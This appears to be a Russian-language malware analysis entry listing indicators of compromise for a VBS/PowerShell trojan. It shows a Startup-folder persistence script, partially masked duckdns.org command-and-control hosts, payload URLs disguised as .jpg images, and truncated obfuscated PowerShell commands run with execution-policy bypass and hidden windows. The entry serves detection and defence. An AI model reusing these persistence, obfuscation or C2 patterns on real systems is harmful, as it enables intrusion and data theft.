Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\ sys32.vbs
- $t1 как %temp + %\ + $t2
- %HOMEPATH%\system32.vbs
- 'vd####.duckdns.org':3303
- http://pr######ones-servicios.com/32/Obfuscate.jpg
- http://pr######ones-servicios.com/32/tedi.jpg
- http://te######.duckdns.org:2022/is-sending%3C%7C%3EC:/Users/DISEL/Desktop/cript/System32.vbs via te#####o.duckdns.org
- http://vd####.duckdns.org:3303/System.Object%5B%5D
- http://te######.duckdns.org:2022/is-ready via te#####o.duckdns.org
- DNS ASK pr######ones-servicios.com
- DNS ASK te#####o.duckdns.org
- DNS ASK vd####.duckdns.org
- '%WINDIR%\syswow64\wscript.exe' "%HOMEPATH%\System32.vbs"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit powershell (-join [char[]](36)+[char](118)+[char](98)+[char](115)+[char](32)+[char](61)+[char](32)+[char](78)+[char](101)+[char](119)+[char](45)+[char](79)+[char](98)+[char](106)+[char]...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -Command "$spl = '\';$vn = 'Guest';function info { try {$mch = [environment]::Machinename;$usr = [environment]::username;$HWD = (Get-WmiObject Win32_LogicalDisk).VolumeS...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c sc query wcncsvc >>
- '%WINDIR%\syswow64\wscript.exe' //B "%HOMEPATH%\"
- '%WINDIR%\syswow64\cmd.exe' /c sc query wcncsvc >>